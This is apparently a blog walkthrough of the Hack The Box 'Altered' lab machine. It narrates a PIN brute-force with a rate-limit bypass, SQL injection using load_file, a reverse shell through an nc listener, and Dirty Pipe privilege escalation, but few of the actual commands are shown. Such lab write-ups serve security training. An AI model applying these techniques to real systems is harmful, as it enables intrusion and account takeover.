In this post, I would like to share a walkthrough of the Altered Machine from Hack the Box


This room will be considered as a Hard machine on Hack The box

What will you gain from the Altered machine?


For the user flag, you will need to abuse the password reset function which you required to bypass the rate limit using HTTP Headers. After we success login to the dashboard, we need to find the endpoint which is vulnerable to SQL Injection


As for the root flag, you need to abuse dirty-pipe vulnerability

Information Gathering on Altered Machine


Once we have started the VPN connection which requires a download from Hackthebox, we can start information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN


I found out that there are only 2 ports open which is ssh and HTTP


Let’s access the website interface.


A Login page has been shown when we try to access the website. Sadly, we don’t have any credentials to play with.


As a result, let’s try entering the common user and password such as admin:admin


However, an error saying “Invalid Password” appears


Let’s try to inspect and see the response to the request


Nothing looks promising to me.


Let’s reset the password by clicking the forgot password


Aside from that, let’s see the response to that request, and nothing looks weird to me


We are required to enter a Pincode which we don’t have now


I did notice there’s a cookie of XSRF-TOKEN and laravel-session.


Therefore, let’s try to brute the pincode using wfuzz.

Bruteforce the pincode


From the wfuzz result, we notice that the character is 6625 which it’s something that I want to look at.


As a result, the website has given us an error saying “Too Many Requests


We can create a list of IP addresses (only the ending potion) to work with.


However, we stuck with an output that we not expecting to see.


After a few hours of troubleshooting, we managed to retrieve the output that we wanted to see.


After entering the pincode on the right column, we have been directed to a page on which we can change the password


Let’s try to access using the password that we change earlier.


At last, we managed to access the Dashboard.


We can see the description of each player is different


Therefore, let’s try to inspect the request via Burpsuite


Let’s copy the id=&secret= output at the bottom of the request


We need to do some modifications to the request payload into json payload

Trying to enumerate with SQL Injection


We can try the common SQLinjection such as or 1=1;– – and i can notice that the website is vulnerable to that attacks method on altered website


We can see the schema name from the SQL database


We can see the table name from the SQL database


Aside from that, we can also retrieve usernames and password from the SQL database but it looks not promising at all.


We know that they are vulnerable to SQL Injection so let’s use the load file command to retrieve information from the server


Let’s see if any new folder or URL has been written on the sNginx configuration


I notice that laravel is been stored inside the server


Let’s throw a reverse shell on the machine


Sadly, the file is not found on the website interface


After a few minutes of troubleshooting, i was curious whether we need $ symbol before cmd


And it works like charm!


We need to inspect the request via Burpsuite and change the request method


Let’s start our nc listener

Let’s throw a reverse shell on the request

After we encode the reverse shell, it doesn’t work at all


Maybe we need to add bash -c before our actual reverse shell and click send on the request. As a result, the response is not responding at all which is good


We got the reverse shell connection back to us


We can read the user flag by executing cat /home/htb/user.txt command

Escalate to Root Privileges Access on altered machine


Let’s see all the common directories that usually have SUID binary stored inside


Sadly, we cannot find any interesting SUID binary


The same goes with ps aux


Let’s see the kernel version


We need a password for www-data


When I execute the su –, it worked like a PAM-Wordle game


From the kernel version, I am aware that the version can be exploited with


I have done some research on dirtypipe vulnerability


We are required to download the exploit on your own machine


For this machine, i will use only the second exploit


Therefore, we need to compile the code


Let’s transfer the compiled file to the victim’s machine


Let’s give execution permission to the file


We require one SUID binary to escalate to root


Let’s find the right SUID binary that we can abuse it


Let’s execute the exploit as shown above


We managed to access to the root


We can read the root flag by executing the “cat root.txt” command